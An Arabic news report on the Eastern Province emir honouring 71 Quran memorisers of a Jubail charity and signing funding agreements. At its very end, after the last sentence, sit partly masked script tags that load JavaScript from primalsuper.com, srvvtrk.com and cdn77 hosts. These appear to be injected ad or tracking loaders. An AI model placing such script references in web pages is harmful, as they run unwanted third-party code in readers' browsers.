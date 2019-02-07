شكرا لقرائتكم خبر عن أمير الشرقية يتوج 71 حافظاً وحافظة لكتاب الله بالجبيل والان نبدء بالتفاصيل

توج صاحب السمو الملكي الأمير سعود بن نايف بن عبدالعزيز أمير المنطقة الشرقية مساء أمس 71 حافظا وحافظة لكتاب الله بالدفعة الخامسة عشرة «تاج الوقار15» بالجمعية الخيرية لتحفيظ القرآن الكريم بمحافظة الجبيل،

وكرم سموه خلال الحفل الذي أقيم في مركز الملك عبدالله الحضاري بالجبيل الصناعية، مجموعة من حفظة كتاب الله على مستوى الجمعية والداعمين والرعاة، وتسلم هدية تذكارية بهذه المناسبة، كما شهد توقيع 3 اتفاقيات بقيمة 30 مليون ريال تتمثل في مدارس تعليمية نسائية ومشروع استثماري لدعم أنشطة الجمعية تشمل بناء مدرسة نسائية.

وقال سموه في كلمته بالحفل: إنها نعمة وأي نعمة أن يصطفينا رب العزة والجلال لخدمةِ كتابه العزيز، الذي قال الله تعالى عنه «وإنّه لكتاب عزيز لا يأتيه الباطلُ من بين يديه ولا من خلفه تنزيل من حكيم حميد»، فخدمة القرآن والقيام بشأنه وتحكيمه هو شأن هذه البلاد المباركة التي أولت كتاب الله تعالى وسنة رسوله -صلى الله عليه وسلم- عنايةً خاصة، بل جعلتهما المصدر والمرجع والنور الذي تهتدي به منذ تأسست على يد الملك عبدالعزيز -طيب الله ثراه- وإلى هذا العهد الزاهر عهد سيدي خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز ال سعود -يحفظه الله-.

وأضاف سموه: إن المتأمل في هذه الجمعية الخيرية لتحفيظ القرآن الكريم بمحافظة الجبيل ومسيرتها وما حققته من أهداف وبرامج وأنشطة وآثارٍ طيبة في خدمة مجتمع الجبيل ليبعث في نفوسنا البهجة والسرور، يسقي ثمارها أهلُ الخير والفضل والعطاء، ممن بذلوا أموالهم وأوقاتهم لدعم وخدمة هذه الجمعية المباركة.

واستطرد سموه قائلا: أبنائي حفظة كتاب الله، لقد أكرمكم الله وشرفكم بحمل كتاب الله، وأقول: هنيئا لكم ثم هنيئا لكم هذا الفضل الذي اصطفاكم الله به وأسال الله أن يلبسكم ووالديكم تاج الوقار، أبارك لكم هذا الإنجاز المبارك وأوصيكم بأن تَتمثلوا كتابَ ربِّكم في أفعالكم وأقوالكم، وكونوا قدوةً لغيرِكم في وسطيتكم واعتدالكم، وإننا حين نُثني عليكم فإننا نبارك لكم ولمن ربّاكم وسهر على نجاحكم فهنيئًا لآبائكم وأمهاتكم هذا الشرف في الدنيا والآخرة.

وسأل سموه في ختام كلمته، الله تعالى أن يحفظ هذه البلاد المباركة في ظل حكومة خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز آل سعود، وصاحب السمو الملكي الأمير محمد بن سلمان بن عبدالعزيز آل سعود ولي العهد نائب رئيس مجلس الوزراء وزير الدفاع -يحفظهما الله-، وأن يديم على بلادنا نعمة الأمن والإيمان والسلامة والإسلام.

وأعرب نائب رئيس مجلس إدارة الجمعية الشيخ خالد الجبر في كلمته بالحفل الذي حضره محافظ الجبيل عبدالله العسكر والرئيس التنفيذي للهيئة الملكية للجبيل الصناعية م. مصطفى المهدي، عن شكره إلى سمو أمير المنطقة الشرقية على رعايته واهتمامه المستمر بالجمعية، والذي يمثل امتدادا لما تقوم به هذه الدولة المباركة من عناية بكتاب الله منذُ عهد الملك عبدالعزيز -يرحمه الله- وحتى عهد خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز آل سعود -حفظه الله- وأشار إلى ارتفاع العدد الإجمالي لخريجي جمعية تحفيظ الجبيل إلى 406 حفاظ وحافظات.

وأكد مدير وزارة الشؤون الإسلامية والأوقاف بفرع المنطقة الشرقية الشيخ عمر الدويش، أن المملكة قوية وراسخة بمنهجها القويم المبني على كتاب الله وسنة رسوله منذ عهد الملك عبدالعزيز -طيب الله ثراه-، ومن بعده أبناؤه البررة حتى عهد خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز ال سعود -حفظه الله- وأن هذه الدولة كانت ومازالت وستظل شامخة بتطبيقها الشريعة الإسلامية السمحة كالمحجة البيضاء أصلها ثابت وفرعها في السماء ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_680578336&key=1fd3b038f796d0b159&cv=1549461207&t=1549461206757" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_538764512&key=1fd3b038f796d0b159&cv=10801&t=1549461206757" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549461206761" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********